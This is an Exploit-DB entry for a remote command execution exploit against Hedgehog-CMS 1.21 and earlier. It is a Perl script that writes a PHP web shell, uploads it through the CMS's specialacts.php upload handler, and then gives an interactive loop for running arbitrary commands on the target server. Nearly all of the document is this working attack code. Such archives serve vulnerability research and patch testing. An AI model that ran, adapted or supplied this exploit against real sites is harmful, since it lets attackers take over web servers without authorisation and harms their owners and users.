Hedgehog-CMS <= 1.21 - Remote Command Execution Exploit

2009-02-09T00:00:00
ID EDB-ID:8015
Type exploitdb
Reporter darkjoker
Modified 2009-02-09T00:00:00

Description

Hedgehog-CMS <= 1.21 Remote Command Execution Exploit. Webapps exploit for php platform

                                        
                                            --+++===================================================================+++--
--+++====== Hedgedog-CMS &lt;= 1.21 Remote Command Execution Exploit ======+++--
--+++===================================================================+++--

#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;

sub usage
{
	print
		"\nHedgedog-CMS &lt;= 1.21 Remote Command Execution Exploit".
		"\n[+] Author   : darkjoker".
		"\n[+] Site     : http://darkjoker.net23.net".
		"\n[+] Download : http://mesh.dl.sourceforge.net/sourceforge/hedgehog-cms/hedgehog-cms_v1.21.zip".
		"\n[+] Usage    : perl ${0} &lt;hostname&gt; &lt;path&gt;".
		"\n[+] Ex.      : perl ${0} localhost /hedgedogCMS".
		"\n\n";
	exit ();
}

sub upload_shell
{
	my ($host, $path) = @_;
	open SHELL, "&gt;shell.php";
	print SHELL "&lt;?php system (stripslashes (\$_GET ['cmd'])); ?&gt;";
	close SHELL;
	my $url = "http://${host}${path}/specialacts.php";
	my $lwp = LWP::UserAgent-&gt;new;
	my $req = $lwp-&gt;request	(
					POST $url,
					Content_Type =&gt; 'multipart/form-data',
					Content	    =&gt; [l_mode =&gt; 1, l_file =&gt; ["shell.php"]],
				);
	unlink "shell.php";
	return 1 if ($req-&gt;is_success);
	return 0;
}

my ($host, $path) = @ARGV;
usage unless $path;
print "[-] Exploit failed.\n" unless upload_shell ($host, $path);
my $cmd;
my $url = "http://${host}${path}/user/upload/shell.php";
while (1)
{
	print "shell\@${host}: \$ ";
	$cmd = &lt;STDIN&gt;;
	chomp $cmd;
	exit if $cmd =~ /quit/;
	my $lwp = LWP::UserAgent-&gt;new;
	my $req = $lwp-&gt;get (
			    	$url . "?cmd=${cmd}",
			    );
	print $req-&gt;decoded_content;
}

# milw0rm.com [2009-02-09]